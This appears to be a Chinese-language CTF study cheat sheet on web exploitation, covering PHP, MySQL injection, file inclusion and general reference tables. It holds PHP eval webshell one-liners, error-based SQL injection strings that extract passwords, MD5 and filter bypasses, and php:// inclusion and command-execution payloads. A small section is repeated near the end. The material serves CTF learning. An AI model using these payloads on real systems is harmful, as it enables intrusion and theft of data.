CTF入门知识点

CTF知识点

md5函数

php 复制代码
<?php
    $a = '123';
    echo md5($a,true);
?>
括号中true显示输出二进制
替换成false显示输出十六进制

绕过

ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是 ' or '6 而 Mysql 刚好又会把 hex 转成 ascii 解释,因此拼接之后的形式是 select * from 'admin' where password='' or '6xxxxx',等价于 or 一个永真式,因此相当于万能密码,可以绕过md5()函数。

弱类型比较

php 复制代码
两个数的md5加密后值0e开头就可以绕过,因为php在进行弱类型比较时,会转换字符串类型,再进行比较
两个数都以0e开头会被认为科学计数法,0e后面加任何数再科学计数法中都是0,所以两数相等
var_dump("0e12345"=="0e66666");//true
var_dump(md5('240610708')==md5('QNKCDZO'));//true

强类型比较

php 复制代码
if(md5((string)$_GET['a'])===md5((string)$_GET['b']))
{<!-- -->
    var_dump($flag);
}
php 复制代码
此时两个md5后的值采用严格比较,没有规定字符串如果这个时候传入的是数组不是字符串,可以利用md5()函数的缺陷进行绕过
var_dump(md5([1,2,3])==md5([4,5,6]));//true

var_dump(md5($_GET['a'])==md5($_GET['b']));
?a[]=1&b[]=1//true
数值类型加密位null

进制

DEC 十进制

HEX 十六进制

BIN 二进制

OCT 八进制

木马

常用一句话

php 复制代码
<?php @eval($_GET['cmd']); ?>
<?php @eval($_POST['cmd']); ?>
<?php @eval($_REQUEST['cmd']); ?>
html 复制代码
<script language="php">eval($_GET['cmd']);</script>
<script language="php">eval($_POST['cmd']);</script>

GIF89a(GIF16进制的ASCII值)

文件头

FF D8 FF E1                   GPEG(jpg)
89 50 4E 47                   PNG(png)
47 49 46 38                   GIF(gif)
49 49 2A 00                   TIFF(tif)
42 4D C0 01                   Windows  Bitmap(bmp)
50 4B 03 04                   ZIP Archive (zip)
52 61 72 21                   RAR Archive (rar)
38 42 50 53                   Adobe Photoshop (psd)
7B 5C 72 74 66                Rich Text Format (rtf)
3C 3F 78 6D 6C                XML(xml)
68 74 6D 6C 3E                HTML (html)
25 50 44 46 2D 31 2E          Adobe Acrobat (pdf)
57 41 56 45                   Wave (wav)
4D 3C 2B 1A                   pcap (pcap)
52 49 46 46                   WEBP(webp)

MIME语法

通用结构:type/subtype

type:表示多个子类的独立类别

subtype:表示细分后的类型

对大小写不敏感,传统都是小写

常用MIME类型

文件类型 MIME类型 描述
.jpg | .jpeg image/jpeg 使用图像公共图像格式
.png image/png
.bin application/octet-stream 当消息是未知类型和包含任何字节数据时使用

SQL注入

堆叠注入中后端代码猜测

*,1

报错注入:

1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))#

1'or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))#

1'or(updatexml(1,concat(0x7e,(select(right(password,25))from(H4rDsq1)),0x7e),1))#

PHP

php 复制代码
error_reporting(0):错误报告等级,参数为0表示关闭所有错误报告
class 定义类 public 定义公共属性 
preg_match 正则表达

php短标签
<?= ?>相当于<?php echo ...?> 例:<?='hello'?> //输出'hello'
php反引号 
可以直接执行系统命令,想输出执行结果还需要echo等函数
<?php echo `ls /`;?>  		 				还可以使用短标签<?='ls /'?>

php5和php7的区别

在 PHP 5 中,assert()是一个函数,我们可以用$_=assert;$_()这样的形式来实现代码的动态执行。但是在 PHP 7 中,assert()变成了一个和eval()一样的语言结构,不再支持上面那种调用方法。(但是好像在 PHP 7.0.12 下还能这样调用)

PHP5中,是不支持($a)()这种调用方法的,但在 PHP 7 中支持这种调用方法,因此支持这么写('phpinfo')();

通配符在RCE中的利用

原理

在正则表达式中,?这样的通配符与其它字符一起组合成表达式,匹配前面的字符或表达式零次或一次。
在 Shell 命令行中,?这样的通配符与其它字符一起组合成表达式,匹配任意一个字符。
同理,我们可以知道*通配符:
在正则表达式中,*这样的通配符与其它字符一起组合成表达式,匹配前面的字符或表达式零次或多次。
在shell命令行中,*这样的通配符与其它字符一起组合成表达式,匹配任意长度的字符串。这个字符串的长度可以是0,可以是1,可以是任意数字。

利用?*在正则表达式和 Shell 命令行中的区别,可以绕过关键字过滤

假设flag在/flag中:
cat /fla?
cat /fla*

假设flag在/flag.txt中:
cat /fla????
cat /fla*

假设flag在/flags/flag.txt中:
cat /fla??/fla????
cat /fla*/fla*

假设flag在flagg文件加里:
cat /?????/fla?
cat /?????/fla*

Python转换交互式

python 复制代码
python -c 'import pty;pty.spawn("/bin/bash")'

ssh登录

ssh -p xx [user@ip](mailto:user@ip)

xx 为 端口号   user为用户名  ip为要登陆的ip

状态码

200  OK
    表示请求被服务器正常处理 

302  Found 
    临时重定向,表示请求的资源临时搬到了其他位置 

304  Not Modified 
    表示客户端发送附带条件的请求时,条件不满足 

400  Bad Request 
    表示请求报文存在语法错误或参数错误,服务器不理解 

403  Forbidden 
    表示对请求资源的访问被服务器拒绝了 

404  Not Found  
    表示服务器找不到你请求的资源

500 Internal Server Error  
    表示服务器执行请求的时候出错了

反序列化

常见的几个魔法函数:
__construct: 在创建对象时候初始化对象,一般用于对变量赋初值

__destruct: 和构造函数相反,当对象所在函数调用完毕后执行

__toString:当对象被当做一个字符串使用时调用

__sleep:序列化对象之前就调用此方法(其返回需要一个数组)

__wakeup:反序列化恢复对象之前调用该方法 优先调用,而不会调用_construct
绕过:序列化字符串中表示对象属性个数的值大于真实属性个数时,就会跳过_wakeup执行

__call:当调用对象中不存在的方法会自动调用该方法

__get:在调用私有属性的时候会自动执行

__isset():在不可访问的属性上调用isset()或empty()触发

__unset():在不可访问的属性上使用unset()时触发

文件包含漏洞

include: 包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行
include_once: 这个函数跟和include语句类似,唯一区别是如果该文件中已经被包含过,则不会再次包含

require: 跟include唯一不同的是,当产生错误时候,整个php文件停止运行
require_once: require_once语句和require 语句完全相同,唯一区别是PHP会检查该文件是否已经被包含过,如果是则不会再次包含

注:这四个函数不管执行哪个后缀的文件,都将他当作php文件执行

远程文件包含

php 复制代码
allow_url_fopen = On(是否允许打开远程文件) allow_url_include = On(是否允许include/require远程文件)
分为 无绕过 ?绕过 #绕过  空格绕过
    
data:// 本身是数据流封装器,原理用法和php://input类似,但是是发送get请求参数
例http://ip/test.php?a=data://text/plain,条件

php伪协议

php://filter
?file=php://filter/convert.base64-encode/resource=xx.php
?file=php://filter/read=convert.base64-encode/resource=xx.php

若base被过滤,utf编码:
?file=php://filter/convert.iconv.utf8.utf16/resource=xx.php 

php://input 条件:allow_url_include=On 实际相当于远程包含利用
php://打开交流文件后,我们直接在流里面写入我们的恶意代码,此时包含可执行文件
例:http://ip/test.php?a=php://input //然后在post里传入所需条件

windows常用命令

netstat -ano  查看系统进程

tasklist 列出任务及进程号

taskkill 杀进程

type 查看文件 类似于linux中cat

md 创建文件夹 类似于linux中mkdir

tree 查看目录结构

tracert 路由跟踪

cls 清空命令行 类似于linux中clear

linux常用命令

ls -a 查看所有文件,包括隐藏文件

echo 输入什么就打印什么

> 覆盖 常见用法 echo word > test.txt 

>> 追加 常见用法 echo word >> test.txt 

find 目录 -name 文件 查找指定文件

grep 参数 目标 

id 显示用户id 所属群id

netstat 网络状态 
-anplt 查看所有tcp端口
-anplu 查看所有udp端口

uname 显示系统信息
-a 显示系统详细信息

--help 命令使用详情

clear 清空命令行

touch 创建文件

mkdir 创建目录

chmod 权限 文件所有者 文件所属组 其他用户 读4 写2 执行1

scp 复制文件和目录

url使用linux命令

?url=system("ls /");注意:ls后面要有一个空格,然后一个分号结束,这不就出来了flag

?url=system("cat /f*");

?url=system("cat /flllllaaaaaaggggggg");

常见端口

数据库 端口号
Oracle 1521
Mysql 3306
Sql server 1433
Redis 6379
PostgreSQL 5432
MongoDB 27017
DB2 50000
服务 端口号
FTP 数据传输 控制链接 20 21
ssh 22
telnet 23
SMTP 简单邮件传输 25
DNS域名解析 53
Http代理 80

常见备份文件名

.git
.svn
.swp
.~
.bak
.bash_history

json对象

存储数据的方式,使用键值对的形式表示数据

JSON对象的语法规则如下:

使用花括号 {} 表示一个JSON对象。
键和值之间使用冒号 : 分隔。
每个键值对之间使用逗号 , 分隔。
键必须是一个字符串,需要用双引号或单引号括起来。
值可以是字符串、数字、布尔值、数组、嵌套的JSON对象或null。

下面是json对象实例

json 复制代码
{
   "name": "John",
   "age": 30,
   "isStudent": false,
   "interests": ["reading", "traveling"],
   "address": {
      "city": "New York",
      "country": "USA"
   },
   "phoneNumber": null

在上面的示例中,name、age、isStudent、address、phoneNumber都是键,对应的值分别是字符串、数字、布尔值、嵌套的JSON对象、null。

你可以使用各种编程语言(如JavaScript、Python、PHP等)来创建、访问和操作JSON对象。

例:[SWPUCTF 2021 新生赛]jicao

php 复制代码
<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

get传入?json={"x":"wllm"}

post传入id=wllmNB

word pdf 文档知识点

word中document.xml文件是所有文字存贮的地方 查找pass

PDF隐写 wbStego4open

PPT 打开时纯色图片 猜是彩虹 红橙黄绿青蓝紫 对应0-6 白色面板是分割

问和操作JSON对象。

例:[SWPUCTF 2021 新生赛]jicao

php 复制代码
<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

get传入?json={"x":"wllm"}

post传入id=wllmNB

[外链图片转存中...(img-pJOVzMpV-1720191316208)]

word pdf 文档知识点

word中document.xml文件是所有文字存贮的地方 查找pass

PDF隐写 wbStego4open

PPT 打开时纯色图片 猜是彩虹 红橙黄绿青蓝紫 对应0-6 白色面板是分割
相关推荐
Sweet_vinegar4 小时前
Wireshark
网络·测试工具·安全·wireshark·ctf·buuctf
梦 & 醒3 天前
【刷题12】ctfshow刷题
数据库·web安全·网络安全·ctf
zhuqiyua3 天前
c语言安全分析(一)——字符串(1)
c语言·c++·安全·ctf·基础
落寞的魚丶3 天前
2024年第四届“网鼎杯”网络安全比赛---朱雀组Crypto- WriteUp
ctf·crypto·网鼎杯·2024年网鼎杯
石氏是时试4 天前
[NewStar 2024] week5完结
ctf
真学不来4 天前
MRCTF2020:千层套路
笔记·python·安全·ctf
A5rZ4 天前
CTF-WEB:PHP伪协议用法总结
php·web·ctf
centos087 天前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
网络安全·二进制·pwn·ctf
Sweet_vinegar7 天前
变异凯撒(Crypto)
算法·安全·ctf·buuctf
Mr_Fmnwon7 天前
【我的 PWN 学习手札】House of Roman
pwn·ctf·heap